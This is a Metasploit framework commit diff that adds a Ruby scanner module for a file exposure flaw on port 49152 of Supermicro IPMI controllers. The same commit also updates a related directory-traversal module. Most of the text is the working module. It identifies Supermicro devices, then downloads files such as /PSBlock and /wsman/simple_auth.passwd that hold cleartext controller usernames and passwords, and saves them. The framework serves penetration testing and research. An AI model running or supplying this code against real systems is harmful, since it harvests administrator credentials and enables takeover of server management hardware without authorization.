Land #3465, @hmoore-r7's module for SMC IPMI Port 49152 file exposure…

… vulnerability
rapid7 · Jun 20, 2014 · 469fae7 · 469fae7
2 parents e6e0de2 + 252d917
commit 469fae7
Show file tree

Hide file tree

Showing 2 changed files with 112 additions and 5 deletions.
diff --git a/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb b/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb
@@ -0,0 +1,104 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'uri'
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Supermicro Onboard IPMI Port 49152 Sensitive File Exposure',
+      'Description' => %q{
+        This module abuses a file exposure vulnerability accessible through the web interface
+        on port 49152 of Supermicro Onboard IPMI controllers.  The vulnerability allows an attacker
+        to obtain detailed device information and download data files containing the clear-text
+        usernames and passwords for the controller. In May of 2014, at least 30,000 unique IPs
+        were exposed to the internet with this vulnerability.
+      },
+      'Author'       =>
+        [
+          'Zach Wikholm <kestrel[at]trylinux.us>', # Discovery and analysis
+          'John Matherly <jmath[at]shodan.io>',    # Internet-wide scan
+          'Dan Farmer <zen[at]fish2.com>',         # Additional investigation
+          'hdm'                                    # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'URL', 'http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/'],
+          [ 'URL', 'https://github.com/zenfish/ipmi/blob/master/dump_SM.py']
+        ],
+      'DisclosureDate' => 'Jun 19 2014'))
+
+    register_options(
+      [
+        Opt::RPORT(49152)
+      ], self.class)
+  end
+
+  def is_supermicro?
+    res = send_request_cgi(
+      {
+        "uri"       => "/IPMIdevicedesc.xml",
+        "method"    => "GET"
+      })
+
+    if res && res.code == 200 && res.body.to_s =~ /supermicro/i
+      path = store_loot(
+        'supermicro.ipmi.devicexml',
+        'text/xml',
+        rhost,
+        res.body.to_s,
+        'IPMIdevicedesc.xml'
+      )
+      print_good("#{peer} - Stored the device description XML in #{path}")
+      return true
+    else
+      return false
+    end
+  end
+
+
+  def run_host(ip)
+
+    unless is_supermicro?
+      vprint_error("#{peer} - This does not appear to be a Supermicro IPMI controller")
+      return
+    end
+
+    candidates = %W{ /PSBlock /PSStore /PMConfig.dat /wsman/simple_auth.passwd }
+
+    candidates.each do |uri|
+      res = send_request_cgi(
+        {
+          "uri"       => uri,
+          "method"    => "GET"
+        })
+
+      next unless res
+
+      unless res.code == 200 && res.body.length > 0
+        vprint_status("#{peer} - Request for #{uri} resulted in #{res.code}")
+        next
+      end
+
+      path = store_loot(
+        'supermicro.ipmi.passwords',
+        'application/octet-stream',
+        rhost,
+        res.body.to_s,
+        uri.split('/').last
+      )
+      print_good("#{peer} - Password data from #{uri} stored to #{path}")
+    end
+  end
+
+end
diff --git a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb
@@ -9,8 +9,10 @@
 class Metasploit3 < Msf::Auxiliary
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::Report
 
+
   APP_NAME = "Supermicro web interface"
 
   def initialize(info = {})
@@ -23,7 +25,8 @@ def initialize(info = {})
         a valid, but not necessarily administrator-level account, to access the contents of any file
         on the system. This includes the /nv/PSBlock file, which contains the cleartext credentials for
         all configured accounts. This module has been tested on a Supermicro Onboard IPMI (X9SCL/X9SCM)
-        with firmware version SMT_X9_214.
+        with firmware version SMT_X9_214. Other file names to try include /PSStore, /PMConfig.dat, and
+        /wsman/simple_auth.passwd
       },
       'Author'       =>
         [
@@ -33,8 +36,8 @@ def initialize(info = {})
       'License'     => MSF_LICENSE,
       'References'  =>
         [
-          #[ 'CVE', '' ],
-          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities' ]
+          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities' ],
+          [ 'URL', 'https://github.com/zenfish/ipmi/blob/master/dump_SM.py']
         ],
       'DisclosureDate' => 'Nov 06 2013'))
 
@@ -107,7 +110,7 @@ def read_file(file, session)
     end
   end
 
-  def run
+  def run_host(ip)
     print_status("#{peer} - Checking if it's a #{APP_NAME}....")
     if is_supermicro?
       print_good("#{peer} - Check successful")
@@ -133,7 +136,7 @@ def run
 
     file_name = my_basename(datastore['FILEPATH'])
     path = store_loot(
-      'supermicro.ipmi.traversal',
+      'supermicro.ipmi.traversal.psblock',
       'application/octet-stream',
       rhost,
       contents,